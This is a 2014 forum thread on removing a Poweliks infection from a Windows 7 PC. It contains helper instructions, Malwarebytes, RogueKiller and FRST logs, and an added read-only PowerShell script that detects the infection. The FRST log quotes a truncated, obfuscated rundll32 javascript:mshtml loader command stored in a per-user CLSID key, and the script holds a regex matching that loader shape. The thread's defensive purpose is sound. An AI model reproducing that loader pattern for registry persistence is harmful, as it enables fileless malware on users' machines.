
Flooded with dllhost.exe *32 (COM Surrogate)



For a couple of weeks, one of our users has had non-stop ESET popups informing him that "an address has been blocked." As this is happening, many dllhost.exe *32 COM Surrogate processes build up in the task manager. This problem is only present on his user account on the computer. I deleted his user profile and had him log in again. The problem cleared for almost a week before it came back. Any help ridding this computer of it would be greatly appreciated. I've run a FRST scan and attached the logs.

Attached: FRST.txt, Addition.txt

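Added triage script for the symptom described above. It is not part of this thread and not one of the tools the helper asks for; it is the check a responder would run on the box before touching anything. It does two things: counts the dllhost.exe "COM Surrogate" processes per parent and marks how many are the 32-bit SysWOW64 copy, and walks every loaded user hive plus HKLM for a CLSID whose LocalServer32 default value launches rundll32.exe with a javascript:/mshtml payload, which is the persistence shape FRST labels Poweliks further down in this thread. Assumptions: an elevated PowerShell 2.0 or later on the Windows 7 x64 host (Get-WmiObject and New-Object PSObject are used instead of their PS 3.0 replacements so it runs on the stock shell); the regex for the loader command is mine, not a vendor signature.

```powershell
# Added example, not from the original thread. Assumes elevated PowerShell 2.0+
# on Windows 7 x64; uses Get-WmiObject so it also runs on the stock PS 2.0.

function Get-ComSurrogateSummary {
    # One row per parent process: how many dllhost.exe children it has and
    # how many of those are the 32-bit (SysWOW64) build the poster saw as "*32".
    $all = Get-WmiObject Win32_Process -Filter "Name = 'dllhost.exe'"
    foreach ($group in ($all | Group-Object ParentProcessId)) {
        $parent = Get-WmiObject Win32_Process -Filter "ProcessId = $($group.Name)"
        $pname = '<exited>'; $pcmd = ''
        if ($parent) { $pname = $parent.Name; $pcmd = $parent.CommandLine }
        $wow64 = @($group.Group | Where-Object { $_.ExecutablePath -like '*\SysWOW64\*' }).Count
        New-Object PSObject -Property @{
            ParentPid  = $group.Name
            ParentName = $pname
            ParentCmd  = $pcmd
            Surrogates = $group.Count
            Wow64Count = $wow64
        }
    }
}

function Find-RundllComHijack {
    # Map HKEY_USERS so per-user hives other than the current one are reachable;
    # the entry FRST flagged in this thread lives under HKU\<SID>, not HKLM.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $roots = @('HKLM:\SOFTWARE\Classes\CLSID',
               'HKLM:\SOFTWARE\Wow6432Node\Classes\CLSID')
    foreach ($hive in Get-ChildItem HKU:\ -ErrorAction SilentlyContinue) {
        if ($hive.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$') {
            $roots += "HKU:\$($hive.PSChildName)\Software\Classes\CLSID"
        }
    }
    # Loader shape quoted by FRST: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ..."
    # (assumed pattern, written for this example).
    $pattern = 'rundll32(\.exe)?.*(javascript:|mshtml|RunHTMLApplication)'
    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($clsid in Get-ChildItem $root -ErrorAction SilentlyContinue) {
            $ls = "$($clsid.PSPath)\LocalServer32"
            if (-not (Test-Path $ls)) { continue }
            $cmd = (Get-ItemProperty -Path $ls -ErrorAction SilentlyContinue).'(default)'
            if ($cmd -and ($cmd -match $pattern)) {
                New-Object PSObject -Property @{
                    Key     = ($ls -replace '^.*::', '')
                    Command = $cmd
                }
            }
        }
    }
}

Write-Host '== dllhost.exe (COM Surrogate) processes by parent =='
Get-ComSurrogateSummary |
    Format-Table ParentPid, ParentName, Surrogates, Wow64Count, ParentCmd -AutoSize

Write-Host '== CLSID LocalServer32 values that launch rundll32 with a script payload =='
$hits = @(Find-RundllComHijack)
if ($hits.Count -eq 0) { Write-Host 'none found' } else { $hits | Format-List }
```

If the second check returns a hit, killing the dllhost.exe processes achieves nothing: the LocalServer32 value survives process termination and reboots, and the payload is relaunched the next time that class is instantiated, so the fix has to remove the key itself (which is what the helper's FRST fixlist does later in a thread like this). The script only reads the registry and lists processes; it changes nothing, so it is safe to run alongside the helper's instructions, but post the output rather than acting on it yourself while a helper is working the case.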

Welcome to the forum. (Do what you can)

General P2P/Piracy Warning:


1. If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar, you must either fully uninstall it or completely disable it from running while being assisted here.

2. If you have illegal/cracked software (MS Office, Adobe Products), cracks, keygens, custom (Adobe) host file, etc. on the system, please remove or uninstall them now and read the policy on Piracy.

Failure to remove such software will result in your topic being closed and no further assistance being provided.

1. Please run a Threat Scan with Malwarebytes

Start Malwarebytes 2.0..........

Click on Settings > Detection and Protection > Non-Malware Protection > PUP (Potentially Unwanted Program) detections > Make sure it's set to Treat detections as malware

Same for PUM (Potentially Unwanted Modifications)

Quarantine all that's found

Post the log (save the log as a .txt file not .xml)

Then......

2. Please download RogueKiller 32 bit to your desktop and run it.

RogueKiller <--- use this one for 64 bit systems

Which system am I using?

Quit all running programs.

For Windows XP, double-click to start.

For Vista or Windows 7-8, right-click the program, select Run as Administrator to start, and when prompted, allow it to run.

Wait for the Prescan to finish

Click Scan to scan the system.

When the scan completes > Don't Fix anything! > Click on the Report Button and post the Report back here.

Don't run any other options, they're not all bad!!!!!!!

RogueKiller logs will also be located here:

%programdata%\RogueKiller\Logs <------- W7

C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <------- XP

(please don't put logs in code or quotes and use the default font)

MrC

Note:

Please read all of my instructions completely including these.

Make sure system restore is turned on and running. Create a new restore point

Make sure you're subscribed to this topic: Click on the Follow This Topic Button (at the top right of this page), make sure that the Receive notification box is checked and that it is set to Instantly

Removing malware can be unpredictable...unlikely but things can go very wrong! Backup any files that cannot be replaced. You can copy them to a CD/DVD, external drive or a pen drive

<+>Please don't run any other scans, download, install or uninstall any programs while I'm working with you.

<+>The removal of malware isn't instantaneous, please be patient.

<+>When we are done, I'll give you instructions on how to clean up all the tools and logs

<+>Please stick with me until I give you the "all clear".

------->Your topic will be closed if you haven't replied within 3 days!<--------

If I don't respond within 24 hours, please send me a PM


Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/4/2014
Scan Time: 9:12:58 AM
Logfile: mbamreport.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.11.04.03
Rootkit Database: v2014.11.01.02
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: bcostello

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 550808
Time Elapsed: 5 min, 30 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 2
PUM.Disabled.SecurityCenter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER|UpdatesDisableNotify, 1, Good: (0), Bad: (1),Replaced,[834078bfe99346f0ba29c470d431f60a]
PUM.Hijack.ConnectionControl, HKU\S-1-5-21-1619941995-4271792153-444280415-1167-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\POLICIES\MICROSOFT\INTERNET EXPLORER\CONTROL PANEL|ConnectionsTab, 1, Good: (0), Bad: (1),Replaced,[80438fa83349c670e404e0546a9b25db]

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


RogueKiller V10.0.4.0 (x64) [Oct 29 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : bcostello [Administrator]
Mode : Scan -- Date : 11/04/2014  09:28:46

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 16 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> Found
[PUM.HomePage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Start Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome  -> Found
[PUM.SearchPage] (X64) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.SearchPage] (X86) HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.SearchPage] (X64) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.SearchPage] (X86) HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main | Search Page : http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-1619941995-4271792153-444280415-3256\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: SAMSUNG SSD PM830 2.5" 7 +++++
--- User ---
[MBR] 4ae5c1f7864edd27dcfcf30b3307905a
[BSP] 2ca67ac4e906422a9807f6f81177dd53 : HP MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 121308 MB
User = LL1 ... OK
User = LL2 ... OK


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 04-11-2014
Ran by bcostello (administrator) on ADC69 on 04-11-2014 10:01:11
Running from C:\Users\rbecker\Desktop
Loaded Profiles: rbecker & bcostello & UpdatusUser (Available profiles: rbecker & kmitchell & bcostello & Administrator & UpdatusUser)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Logitech, Inc.) C:\Program Files\Logitech\SolarApp\L4301_Solar.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe
(Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(National Instruments Corporation) C:\Windows\SysWOW64\lkads.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\MAX\nimxs.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVCM.EXE
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe
(O2Micro International) C:\Windows\System32\o2flash.exe
() C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer_Service.exe
(Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(National Instruments, Inc.) C:\Windows\SysWOW64\lkcitdl.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(National Instruments Corporation) C:\Windows\SysWOW64\lktsrv.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Authentec Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version6\TeamViewer.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(National Instruments Corporation) C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Creative Technology Ltd) C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Nikon Corporation) C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [682904 2012-09-19] (Alps Electric Co., Ltd.)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1425408 2012-02-13] (IDT, Inc.)
HKLM\...\Run: [IntelPROSet] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [4805936 2012-08-23] (Intel® Corporation)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2916584 2010-08-12] (ESET)
HKLM\...\Run: [Conisio Login Manager] => C:\Program Files\SolidWorks Enterprise PDM\EdmServer.exe [1614336 2014-01-15] (Dassault Systemes SolidWorks Corp.)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-10-16] (Intel Corporation)
HKLM-x32\...\Run: [Dell Webcam Central] => C:\Program Files (x86)\Dell Webcam\Dell Webcam Central\WebcamDell2.exe [462974 2011-12-16] (Creative Technology Ltd)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [38984 2013-05-10] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840768 2013-05-10] (Adobe Systems Inc.)
HKLM-x32\...\Run: [Nikon Message Center 2] => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe [571392 2011-10-30] (Nikon Corporation)
HKLM-x32\...\Run: [NI Update Service] => C:\Program Files (x86)\National Instruments\Shared\Update Service\NIUpdateService.exe [853640 2012-11-16] (National Instruments)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (Authentec Inc.)
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...\MountPoints2: {c8e9ef48-7ba9-11e2-8a3a-806e6f6e6963} - C:\Windows\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL D:\contents_TGSG2\setup.htm
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-1619941995-4271792153-444280415-3256\...\Run: [NIRegistrationWizard] => C:\Program Files (x86)\National Instruments\Shared\RegistrationWizard\Bin\RegistrationWizard.exe [846520 2010-06-21] ()
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [184048 2013-12-04] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [156256 2013-12-04] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NI Error Reporting.lnk
ShortcutTarget: NI Error Reporting.lnk -> C:\Program Files (x86)\National Instruments\Shared\NI Error Reporting\nierserver.exe (National Instruments Corporation)
Startup: C:\Users\kmitchell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\ONENOTEM.EXE (Microsoft Corporation)
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers: [EnabledUnlockedFDEIconOverlay] -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
ShellIconOverlayIdentifiers: [UninitializedFdeIconOverlay] -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.)
BootExecute: autocheck autochk * bootdelete

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xCB8CB9EA9BF7CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1619941995-4271792153-444280415-1167\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1619941995-4271792153-444280415-3256\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL =
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Winsock: Catalog5 10 C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [24320] (National Instruments Corporation)
Winsock: Catalog5-x64 10 C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [26368] (National Instruments Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.5 192.168.1.6

FireFox:
========
FF ProfilePath: C:\Users\bcostello\AppData\Roaming\Mozilla\Firefox\Profiles\fxbxrcay.default
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
